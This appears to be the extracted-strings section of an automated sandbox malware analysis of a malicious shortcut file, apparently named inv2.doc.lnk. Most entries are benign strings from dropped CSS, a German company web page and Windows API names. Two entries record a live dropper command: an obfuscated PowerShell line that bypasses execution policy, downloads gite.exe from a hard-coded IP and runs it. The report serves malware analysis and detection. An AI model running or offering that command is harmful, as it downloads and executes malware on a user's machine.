.ie7 .nav-menu .sub-menu,

Ansi based on Dropped File (ie179663103.css)

.ie7 .nav-menu li a,

Ansi based on Dropped File (ie179663103.css)

.ie7 .nav-menu li {

Ansi based on Dropped File (ie179663103.css)

.ie7 .nav-menu ul li:hover > ul {

Ansi based on Dropped File (ie179663103.css)

.ie7 .nav-menu ul {

Ansi based on Dropped File (ie179663103.css)

.ie7 .paging-navigation .meta-nav {

Ansi based on Dropped File (ie179663103.css)

.ie7 .screen-reader-text {

Ansi based on Dropped File (ie179663103.css)

.ie7 .sidebar .format-status .entry-content,

Ansi based on Dropped File (ie179663103.css)

.ie7 .sidebar .format-status .entry-meta {

Ansi based on Dropped File (ie179663103.css)

.ie7 .sidebar .paging-navigation .nav-links {

Ansi based on Dropped File (ie179663103.css)

.ie7 .sidebar .post-navigation .nav-links,

Ansi based on Dropped File (ie179663103.css)

.ie7 .site-footer .widget-area {

Ansi based on Dropped File (ie179663103.css)

.ie7 .site-header .search-form [type="search"],

Ansi based on Dropped File (ie179663103.css)

.ie7 .site-header .search-form [type="text"] {

Ansi based on Dropped File (ie179663103.css)

.ie7 .site-header {

Ansi based on Dropped File (ie179663103.css)

.ie7 input[type="button"],

Ansi based on Dropped File (ie179663103.css)

.ie7 input[type="checkbox"],

Ansi based on Dropped File (ie179663103.css)

.ie7 input[type="radio"] {

Ansi based on Dropped File (ie179663103.css)

.ie7 input[type="reset"],

Ansi based on Dropped File (ie179663103.css)

.ie7 input[type="submit"] {

Ansi based on Dropped File (ie179663103.css)

.ie7 legend {

Ansi based on Dropped File (ie179663103.css)

.ie7 textarea {

Ansi based on Dropped File (ie179663103.css)

.ie7 ul.nav-menu li:hover > ul,

Ansi based on Dropped File (ie179663103.css)

.ie7 video {

Ansi based on Dropped File (ie179663103.css)

.ie8 .author-info {

Ansi based on Dropped File (ie179663103.css)

.ie8 .format-status .entry-content:before,

Ansi based on Dropped File (ie179663103.css)

.ie8 .format-status .entry-meta:before {

Ansi based on Dropped File (ie179663103.css)

.ie8 .paging-navigation .nav-next {

Ansi based on Dropped File (ie179663103.css)

.ie8 .paging-navigation .nav-previous .meta-nav {

Ansi based on Dropped File (ie179663103.css)

.ie8 .sidebar .entry-content,

Ansi based on Dropped File (ie179663103.css)

.ie8 .sidebar .entry-header,

Ansi based on Dropped File (ie179663103.css)

.ie8 .sidebar .entry-meta {

Ansi based on Dropped File (ie179663103.css)

.ie8 .sidebar .entry-summary,

Ansi based on Dropped File (ie179663103.css)

.ie8 .site {

Ansi based on Dropped File (ie179663103.css)

.ie8 .site-main .widget-area {

Ansi based on Dropped File (ie179663103.css)

.ie8 img.size-full,

Ansi based on Dropped File (ie179663103.css)

.ie8 img.size-large {

Ansi based on Dropped File (ie179663103.css)

.menu-toggle:after:hover,

Ansi based on Dropped File (ie179663103.css)

.nav-menu .children ul {

Ansi based on Dropped File (ie179663103.css)

.nav-menu .sub-menu ul,

Ansi based on Dropped File (ie179663103.css)

.rtl .comment-reply-link:before,

Ansi based on Dropped File (ie179663103.css)

.rtl .comment-reply-login:before {

Ansi based on Dropped File (ie179663103.css)

.rtl .format-audio .entry-content:before,

Ansi based on Dropped File (ie179663103.css)

.site {

Ansi based on Dropped File (ie179663103.css)

.site-footer .widget {

Ansi based on Dropped File (ie179663103.css)

.site-header .home-link {

Ansi based on Dropped File (ie179663103.css)

.site-header .search-form [type="search"],

Ansi based on Dropped File (ie179663103.css)

.site-header .search-form [type="text"] {

Ansi based on Dropped File (ie179663103.css)

.site-main .sidebar-inner {

Ansi based on Dropped File (ie179663103.css)

.site-main .widget-area {

Ansi based on Dropped File (ie179663103.css)

.tags-links a:first-child:before:hover,

Ansi based on Dropped File (ie179663103.css)

.widget {

Ansi based on Dropped File (ie179663103.css)

/* License: GNU/GPL

Ansi based on Dropped File (ext.default.css)

/* Web: http://www.asdesigning.com

Ansi based on Dropped File (ext.default.css)

/* Web: http://www.astemplates.com

Ansi based on Dropped File (ext.default.css)

/* Internet Explorer 7 */

Ansi based on Dropped File (ie179663103.css)

/* Internet Explorer 8 */

Ansi based on Dropped File (ie179663103.css)

Ansi based on Dropped File (jquery.cycle2.tile.min.js)

Ansi based on Runtime Data (exE )

Ansi based on Dropped File (jquery.cycle2.tile.min.js)

/* RTL for Internet Explorer 7 & 8 */

Ansi based on Dropped File (ie179663103.css)

/** *Datanavigator is a web application development tool by Frank van den Heuvel. *Copyright

Ansi based on Runtime Data (exE )

Ansi based on Dropped File (lang-en.js)

/*******************************************************************************************/

Ansi based on Dropped File (ext.default.css)

Ansi based on Runtime Data (exE )

Ansi based on Dropped File (ext.default.css)

Ansi based on Runtime Data (exE )

Ansi based on Dropped File (ie179663103.css)

// DO NOT EDIT BELOW THIS LINE

Ansi based on Dropped File (unternehmen.jsp)

/[] "

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

Ansi based on Process Commandline (cmd.exe)

/D /c"

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

/gite.exe

Ansi based on PCAP Processing (PCAP)

/MM/yy

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

0 0$0(0,040<0@0H0L0P0

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

46.30.43.107

Ansi based on PCAP Processing (PCAP)

6.1.7601.17514

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Runtime Data (exE )

Ansi based on Dropped File (unternehmen.jsp)

</div> ... content closed -->

Ansi based on Dropped File (unternehmen.jsp)

</div> ... content_inner closed -->

Ansi based on Dropped File (unternehmen.jsp)

</div> ... header closed-->

Ansi based on Dropped File (unternehmen.jsp)

</div> ... header_inner closed-->

Ansi based on Dropped File (unternehmen.jsp)

</div> ... primary closed -->

Ansi based on Dropped File (unternehmen.jsp)

</div> ... secondary closed -->

Ansi based on Dropped File (unternehmen.jsp)

</div>... container_600 closed -->

Ansi based on Dropped File (unternehmen.jsp)

<>+-*/%()|^&=,

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

<a class="gg_bg flag_de" href="/wcm/de/unternehmen/global-gateway"><span><img src="images/flags/de.gif" />Deutschland   |  <b>Worldwide</b></span></a>

Ansi based on Dropped File (unternehmen.jsp)

<a href="/wcm/de/impressum/datenschutz">Datenschutz</a> ·</a>

Ansi based on Dropped File (unternehmen.jsp)

<a href="/wcm/de/impressum/impressum">Impressum</a> ·</a>

Ansi based on Dropped File (unternehmen.jsp)

<a href="/wcm/de/start">Start</a>

Ansi based on Dropped File (unternehmen.jsp)

<a href="/wcm/de/unternehmen/wir-ueber-uns">ELO Digital Office GmbH</a>

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

<a href="http://elo.com/wcm/de/unternehmen/kontakt">Kontakt</a> ·</a>

Ansi based on Dropped File (unternehmen.jsp)

<a name="d1092"></a><h1>Vielen Dank</h1>

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

<li class="eloheadersel"><a class="eloheadersel" href="/wcm/de/start"><span>Start</span></a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a href="/wcm/de/produkte/erweiterungen/module/elo-backup">ELO Backup</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a href="/wcm/de/produkte/erweiterungen/module/elo-barcode">ELO Barcode</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a href="/wcm/de/produkte/erweiterungen/module/elo-for-mobile-devices">ELO for Mobile Devices</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a href="/wcm/de/produkte/erweiterungen/module/elo-replikation">ELO Replikation</a></li>

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

<li> <a href="/wcm/de/produkte/erweiterungen/schnittstellen/elo-for-sharepoint">ELO for Sharepoint</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a href="/wcm/de/service/support">ELO Support</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a href="/wcm/de/unternehmen">Kontakt</a><br /></li>

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

<li> <a href="/wcm/de/unternehmen/auszeichnungen-und-studien">Auszeichnungen</a></li>

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

<li> <a href="/wcm/de/unternehmen/wir-ueber-uns/philosophie">ELO Philosophie</a><br /></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a href="/wcm/de/unternehmen/wir-ueber-uns/standorte">Standorte</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a href="http://partner.elo.com/referenzfinder.html">Kundenreferenzen</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a target="_blank" href="https://elooffice.elo.com/service/schulungen.html">ELOoffice Schulungen</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a target="_blank" target="_blank" title="ELOoffice Blog" href="http://blog.elooffice.de">ELO<span class="times">office</span> Blog</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a target="_blank" title="ELO Business-Partner" href="http://elooffice.elo.com/kaufen/distributoren.html">ELO<span class="times">office</span> Distributor</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a target="_blank" title="ELO Fachhndler" href="http://elooffice.elo.com/kaufen/fachhaendler.html">ELO<span class="times">office</span> Fachhndler</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a target="_blank" title="ELOoffice Testversion" href="http://elooffice.elo.com/testversion.html">ELO<span class="times">office</span> Testversion</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a title="ELO Business-Partner" href="https://partner.elo.com/elo-business-partner-finden.html">ELO Business-Partner</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a title="ELO Strategie-Partner" href="/wcm/de/partner/partner-werden">Partner werden</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a title="ELO-Kooperationspartner" href="http://partner.elo.com/kooperationspartner.html">ELO-Kooperationspartner</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li> <a title="ELOoffice Downloads" target="_blank" href="http://elooffice.elo.com/service/downloadcenter.html">ELO<span class="times">office</span> Downloads</a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li><a href="/wcm/de/events"><span>Events</span></a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li><a href="/wcm/de/loesungen"><span>Lsungen</span></a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li><a href="/wcm/de/mediathek"><span>Mediathek</span></a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li><a href="/wcm/de/partner"><span>Partner</span></a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li><a href="/wcm/de/produkte"><span>Produkte</span></a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li><a href="/wcm/de/service"><span>Service</span></a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li><a href="/wcm/de/unternehmen"><span>Unternehmen</span></a></li>

Ansi based on Dropped File (unternehmen.jsp)

<li><a href="http://partner.elo.com/referenzfinder.html">Kundenreferenzen</a></li>

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

<li><b>ELO Partnernetzwerk: </b></li>

Ansi based on Dropped File (unternehmen.jsp)

<li><b>ELO-Erweiterungen:</b></li>

Ansi based on Dropped File (unternehmen.jsp)

<li><b>Ntzliche Links:</b></li>

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

<p><a href="http://www.elo.com">Hier </a>gelangen Sie <a href="http://www.elo.com">zurck zur Startseite</a>.</p></div>

Ansi based on Dropped File (unternehmen.jsp)

<p>Wir haben Ihre Anfrage erhalten und werden diese umgehend bearbeiten.</p>

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

Ansi based on Dropped File (unternehmen.jsp)

=,;+/[] "

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

?terminate@@YAXXZ

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

@.data

Ansi based on Dropped File (Roaming.exE.1622950302)

@media (max-width: 767px)

Ansi based on Dropped File (ext.default.css)

@media (min-width: 768px)

Ansi based on Dropped File (ext.default.css)

[...]

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

[Rename]

Ansi based on Dropped File (Roaming.exE.1622950302)

\CMD.EXE

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

\Microsoft\Internet Explorer\Quick Launch

Unicode based on Hybrid Analysis (exE , 00022258-00003592.00000000.22762.00401000.00000020.mdmp)

\Policies\Microsoft\Windows\System

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

\RPC Control\console-0x00000EE8-lpc-handle

Unicode based on Runtime Data (cmd.exe )

\Sessions\1\Windows\ApiPort

Unicode based on Runtime Data (cmd.exe )

\Shell\Open\Command

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

\ThemeApiPort

Unicode based on Runtime Data (exE )

\XCOPY.EXE

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

__getmainargs

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

_local_unwind4

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (exE )

`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (exE )

Args: `%s'

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Ansi based on Dropped File (ext.default.css)

Ansi based on Dropped File (ext.default.css)

Ansi based on Dropped File (ext.default.css)

Ansi based on Dropped File (ext.default.css)

background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#e5e5e5), to(#c5c5c5));

Ansi based on Dropped File (ext.default.css)

background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#f1f1f1), to(#dddddd));

Ansi based on Dropped File (ext.default.css)

Ansi based on Dropped File (ext.default.css)

Ansi based on Dropped File (ext.default.css)

Ansi based on Dropped File (ext.default.css)

Ansi based on Dropped File (ext.default.css)

background-position: center bottom !important;

Ansi based on Dropped File (ext.default.css)

background: url('../images/dd.arrow.png') left top no-repeat;

Ansi based on Dropped File (ext.default.css)

background: url('../images/ddr.arrow.png') left top no-repeat;

Ansi based on Dropped File (ext.default.css)

background: url('../images/li.bg.png') left top no-repeat;

Ansi based on Dropped File (ext.default.css)

%LOCALAPPDATA%\Temp

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

%WINDIR%\System32\cmd.exe

Ansi based on Memory/File Scan (inv2.doc.lnk.bin)

CCCC@40`P@

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

clip: rect(1px 1px 1px 1px); /* IE7 */

Ansi based on Dropped File (ie179663103.css)

CMD Internal Error %s

Ansi based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

cmd.exe

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

cmd.pdb

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Cmd: %s Type: %x

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CmdBatNotification

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CMDCMDLINE

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

CMDEXTVERSION

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

COMCTL32.dll

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

COMSPEC

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF0000.00000002.mdmp)

Control Panel\Desktop\ResourceLocale

Unicode based on Hybrid Analysis (exE , 00022258-00003592.00000000.22762.00401000.00000020.mdmp)

COPY.EXE

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

DataNavigator_LANG.update({JS_CancelChanges: 'Your data has changed. Are you sure you do not want to save them?',

Ansi based on Dropped File (lang-en.js)

dd/MM/yy

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

DIRCMD

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

DisableLocalOverride

Unicode based on Runtime Data (cmd.exe )

DLOCAL

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

ease wait while Setup is loading...

Unicode based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

EFAULT\Control Panel\International

Unicode based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

Error launching installer

Unicode based on Dropped File (Roaming.exE.1622950302)

Error writing temporary file. Make sure your temp folder is valid.

Unicode based on Dropped File (Roaming.exE.1622950302)

exEcUtIonPolICy bYpaSS -NoPrOFILe (NEW-objEcT systeM.NET.wEBclIEnT).DoWnLOadFile('http://46.30.43.107/gite.exe','%APPDATA%\exE');sTArt-PRoceSs C:\Users\%USERNAME%\AppData\Roaming.exE

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Ansi based on Dropped File (unternehmen.jsp)

FileTimeToLocalFileTime

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

filter: alpha(opacity=0);

Ansi based on Dropped File (ie179663103.css)

filter: alpha(opacity=70);

Ansi based on Dropped File (ie179663103.css)

filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffe5e5e5', endColorstr='#ffc5c5c5', GradientType=0);

Ansi based on Dropped File (ext.default.css)

filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff1f1f1', endColorstr='#ffdddddd', GradientType=0);

Ansi based on Dropped File (ext.default.css)

GetBinaryTypeW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetClassInfoW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetCommandLineW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetConsoleScreenBufferInfo

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetCPInfo

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetCurrentProcess

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetCurrentProcessId

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetExitCodeProcess

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetFileVersionInfoSizeW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetFileVersionInfoW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

GetLastError

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetLocaleInfoW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetLocalTime

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetNumaNodeProcessorMaskEx

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GeToken: (%x) '%s'

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetProcAddress

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetProcessHeap

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetStartupInfoW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetThreadGroupAffinity

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetThreadLocale

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetVersion

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

GetVolumeInformationW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

HH:mm:ss t

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

img.alignleft {

Ansi based on Dropped File (ie179663103.css)

img.alignright {

Ansi based on Dropped File (ie179663103.css)

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error

Unicode based on Dropped File (Roaming.exE.1622950302)

JS_InvalidInput: 'Please check input of marked fields! Cannot save while input is invalid!',

Ansi based on Dropped File (lang-en.js)

JS_WaitUntilFinished: 'Please wait until current submit finishes!'});

Ansi based on Dropped File (lang-en.js)

k has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error

Unicode based on Dropped File (Roaming.exE.1622950302)

left: 187px !important;

Ansi based on Dropped File (ext.default.css)

lication></compatibility></assembly>

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

line-height: 1.0;

Ansi based on Dropped File (ext.default.css)

Local

Unicode based on Runtime Data (cmd.exe )

LocalFree

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

LocalizedName

Unicode based on Runtime Data (exE )

LocalRedirectOnly

Unicode based on Runtime Data (exE )

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

MM/dd/yy

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

msctls_progress32

Unicode based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

NtQueryInformationProcess

Ansi based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

NtSetInformationProcess

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

padding: 0.5em 1em 0.3em;

Ansi based on Dropped File (ext.default.css)

PoWerShell.exe

Unicode based on Runtime Data (cmd.exe )

PoWerShell.exe -exEcUtIonPolICy bYpaSS -NoPrOFILe (NEW-objEcT systeM.NET.wEBclIEnT).DoWnLOadFile('http://46.30.43.107/gite.exe','%APPDATA%\exE');sTArt-PRoceSs %APPDATA%\exE

Ansi based on Process Commandline (powershell.exe)

PoWerShell.exe"*

Unicode based on Runtime Data (cmd.exe )

RegCloseKey

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RegCreateKeyExW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RegDeleteKeyExW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

RegDeleteKeyW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

RegEnumKeyW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

RegOpenKeyExW

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

setlocale

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetLocalTime

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SetThreadLocale

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

SHGetFileInfoW

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

Software\Microsoft\Command Processor

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Software\Microsoft\Windows\CurrentVersion

Unicode based on Hybrid Analysis (exE , 00022258-00003592.00000000.22762.00401000.00000020.mdmp)

Software\Policies\Microsoft\Windows\System

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

Styles for older IE versions (previous to IE9).

Ansi based on Dropped File (ie179663103.css)

System32 (%WINDIR%\

Unicode based on Memory/File Scan (inv2.doc.lnk.bin)

TLOCAL

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A014000.00000004.mdmp)

top: 5px !important;

Ansi based on Dropped File (ext.default.css)

Ungetting: '%s'

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

var _vwo_code=(function(){

Ansi based on Dropped File (unternehmen.jsp)

verifying installer: %d%%

Unicode based on Dropped File (Roaming.exE.1622950302)

VERSION.dll

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00408000.00000002.mdmp)

VS_VERSION_INFO

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

ware\Microsoft\Command Processor

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

width: 16.66%;

Ansi based on Dropped File (ext.default.css)

ws Command Processor

Unicode based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

wwwwww

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

wwwwwwp

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

wwwwwwww

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

wwwwwwwwp

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

wwwwwwwwwwwwwww

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

wwwwwwwwwwwwwwwwwwwww

Ansi based on Memory/File Scan (cmd.exe , 00019473-00003804.00000000.19977.4A031000.00000002.mdmp)

wwwwwwwx

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

yy/MM/dd

Unicode based on Hybrid Analysis (cmd.exe , 00019473-00003804.00000000.19977.49FF1000.00000020.mdmp)

z-index: 50 !important;

Ansi based on Dropped File (ext.default.css)

{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}

Unicode based on Runtime Data (exE )

{20D04FE0-3AEA-1069-A2D8-08002B30309D}

Unicode based on Runtime Data (exE )

{56784854-C6CB-462B-8169-88E350ACB882}

Unicode based on Runtime Data (exE )

{59031A47-3F72-44A7-89C5-5595FE6B30EE}

Unicode based on Runtime Data (exE )

{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}

Unicode based on Runtime Data (exE )

{s<.8

Ansi based on Memory/File Scan (exE , 00022258-00003592.00000000.22762.00458000.00000002.mdmp)

|<>/":

Unicode based on Dropped File (Roaming.exE.1622950302)

/gite.exe

